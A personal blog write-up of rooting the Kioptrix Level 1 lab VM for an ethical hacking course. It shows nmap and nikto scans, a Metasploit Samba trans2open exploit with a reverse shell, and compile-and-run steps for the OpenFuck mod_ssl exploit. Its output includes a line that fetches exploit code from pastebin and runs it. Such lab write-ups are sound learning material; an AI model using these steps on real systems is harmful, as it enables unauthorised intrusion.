Write Up: Kioptrix 1

In this post I'm going to go over my experience working the Kioptrix Level 1 beginners box from VulnHub. This is essentially a write up and a set of study notes in one piece.

This post is based off of my learning experience with Heath Adam's course, Practical Ethical Hacking. I followed all of Adam's steps and instructions so that I could learn his methodology and learn about tools I never even knew existed (because you know, I've been at this for five minutes.)

Installation

Installing the VM was a pain in the arse but luckily the TCMSec team had me covered by having a working copy of the system in question. I won't post a link here as I'm unsure if I'm allowed to.

Breaking it down

Here are the steps taken:

  1. nmap scan of the host to discover possible entry points
  2. Hitting ports 80 and 443 in the browser to see what comes back
  3. Using nikto to scan the website for possible vulnerabilities
  4. Using dirbuster to find sub-directories and possibly sensitive files like backups and credentials
  5. Do some manual searches to find exploits
  6. Execute Nesus to get some confirmation on found exploits
  7. Use Metasploit Framework to root (pop) the system
  8. Use OpenFuck (soiler alert!) to manually pop the system

The Scan - nmap

Here is an initial scan of the system. I used this nmap command:

nmap -T4 -p- -A $IP

This can be broken down as such:

  • -T4 - this is the speed at which nmap scans the target. This flag accepts a scale from 1-5
  • -p- - the ports to scan. In this case, - after the -p essentially means: everything
  • -A - this means scan All. It instructs nmap to scan everything it can possibly scan after finding an open port.

Adam points out that using -sS isn't a thing anymore. It's and old-school method of scanning a remote host without being detected. The flag can be translated to -scanStealth in "long form". It worked by initiating a TCP SYN, waiting for a TCP SYN/ACK, and then instead of sending a second TCP ACK it instead sent a TCP RST, resetting the connection.

So the results of the scan for me turned out like this:

$ nmap -T4 -p- -A 10.0.2.10                                                                                130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-20 08:37 AEST
Nmap scan report for 10.0.2.10
Host is up (0.00029s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1          32768/tcp   status
|_  100024  1          32768/udp   status
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2021-04-20T12:39:06+00:00; +14h00m30s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
32768/tcp open  status      1 (RPC #100024)

Host script results:
|_clock-skew: 14h00m29s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
The results from our nmap scan

So what did we find?

  • Ports 80 and 443 suggesting a website or websites are present;
  • Ports 139 suggesting a SMB share is being hosted here;
  • Port 22 - nothing surprising here except at this point it tells us we're dealing with Linux (guranteed with this box given it was built in 2011, if not earlier, and OpenSSH wasn't available natively in Windows Server at that point.)
  • And port 32768 which is something called IBM FileNet. I've never heard of this before today.

Let's move onto enumerating the system further, starting with ports 80

Nikto

This great little tool was invoked as such:

nikto -h http://$IP/

And the results were fascinating:

$ nikto -h http://10.0.2.10                                                                                                                                                                                                            1 ⨯
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.2.10
+ Target Hostname:    10.0.2.10
+ Target Port:        80
+ Start Time:         2021-04-20 19:58:26 (GMT10)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep  6 13:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ 8707 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time:           2021-04-20 20:00:08 (GMT10) (102 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Do note that nikto is considered "loud" and not always a good choice.

DisBuster

A nifty little tool, DirBuster was able to find a tonne of stuff such as Webalizer metrics/logs/visualisations and a testing PHP page.

I decided not to explore too much of this stuff except for the items Heath goes over in his course in the interest of time.

Manual Exploit Discovery

Before going into automatic exploit discovery, like Nessus (below), Heath teaches and encourages the student to Google around for exploits. Here is what I found.

These are the primary entry points. There are possibly others, perhaps via Webalizer, but I haven't trained in web exploitation yet, so I'm keeping this simple.

Nessus

In Heath's course we cover Nessus and run it against the Kioptrix 1 VM. Here is a screengrab of my results:

Kioptrix 1 under the microscope that is Nessus

It's safe to say this box has a few issues. Here's a screenshot showing the critical issues discovered:

So Nessus found a lot wrong with the system. Far more than we did manually searching for things.

Metasploit Framework - Getting root

Once we know what kind of options we have available to us we can search for exploits in MSF.

With the Samba exploit I (and Nessus) found something called trans2open. MSF has modules for this across multiple operating systems:

msf6 > search trans2open

Matching Modules
================

   #  Name                              Disclosure Date  Rank   Check  Description
   -  ----                              ---------------  ----   -----  -----------
   0  exploit/freebsd/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (*BSD x86)
   1  exploit/linux/samba/trans2open    2003-04-07       great  No     Samba trans2open Overflow (Linux x86)
   2  exploit/osx/samba/trans2open      2003-04-07       great  No     Samba trans2open Overflow (Mac OS X PPC)
   3  exploit/solaris/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (Solaris SPARC)

So we have:

  • exploit/freebsd/samba/trans2open
  • exploit/linux/samba/trans2open
  • exploit/osx/samba/trans2open
  • exploit/solaris/samba/trans2open

We know from our scans that we're dealing with a RedHat Linux host:

http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

Which we got from our nmap. Although not guaranteed to be accurate, given we found port 22 for sshd and we detected Apache, it's very likely to be a Linux system.

To exploit the system we "load" the exploit/linux/samba/trans2open exploit:

msf6 > use exploit/linux/samba/trans2open
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp

Notice the information re: "no payload configured". The default payload is a staged payload (it executed in stages, which is unstable and doesn't always work.) I tried the default and it failed.

Changing the payload is simple enough. Here's a list of available options (this is a screenshot due to the width/size of the output):

Because I tried the staged payload and it didn't work, I should now find and use a non-staged payload. The option we want is: linux/x86/shell_reverse_tcp. Knowing why this option is non-staged is covered by Heath, but a Google search should yield results.

After finding the correct module to load, setting a working payload, we can set the remote host and execute exploit:

msf6 exploit(linux/samba/trans2open) > exploit

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] 10.0.2.10:139 - Trying return address 0xbffffdfc...
[*] 10.0.2.10:139 - Trying return address 0xbffffcfc...
[*] 10.0.2.10:139 - Trying return address 0xbffffbfc...
[*] 10.0.2.10:139 - Trying return address 0xbffffafc...
[*] Command shell session 1 opened (10.0.2.15:4444 -> 10.0.2.10:32769) at 2021-04-26 15:28:12 +1000

whoami
root
hostname
kioptrix.level1

via GIPHY

Manual Exploitation: OpenFuck

Although Metasploit Framework is used a lot in the real world, a lot of certifications, such as the OSCP, want you to manually exploit systems so that you can demonstrate an understanding of what the f- is going on.

With my basic Googling to uncover an exploit for Samba 2.2.1a I discovered OpenFuck.

It's a piece of C code that I am yet to fully understand, but I appreciate what it's doing. The steps to use this little gem are relatively simple:

  1. Install libssl-dev locally
  2. Compile the file using gcc: gcc -o OpenFuck OpenFuck.c -lcrypt
  3. Execute, provinding the right flags: ./OpenFuck 0x6b 10.0.2.10 -c 40

The 0x6b selects the correct "playload", if you like, and the -c 40 sets the number of connections. I won't pretend to understand what the latter means.

Here's the entire output:

┌──(kali㉿kali)-[~/git/kioptrix_1/OpenLuck]
└─$ ./OpenFuck 0x6b 10.0.2.10 -c 40  

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f80a8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
race-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; m/raw/C7v25Xr9 -O pt 
--15:39:24--  https://pastebin.com/raw/C7v25Xr9
           => `ptrace-kmod.c'
Connecting to pastebin.com:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]

    0K ...                                                    @   3.84 MB/s

15:39:25 (3.84 MB/s) - `ptrace-kmod.c' saved [4026]

ptrace-kmod.c:183:1: warning: no newline at end of file
/usr/bin/ld: cannot open output file p: Permission denied
collect2: ld returned 1 exit status

whoami
root
hostname
kioptrix.level1

Enjoy.

Michael Crilly

Michael Crilly

A simple nerd.
Brisbane, Australia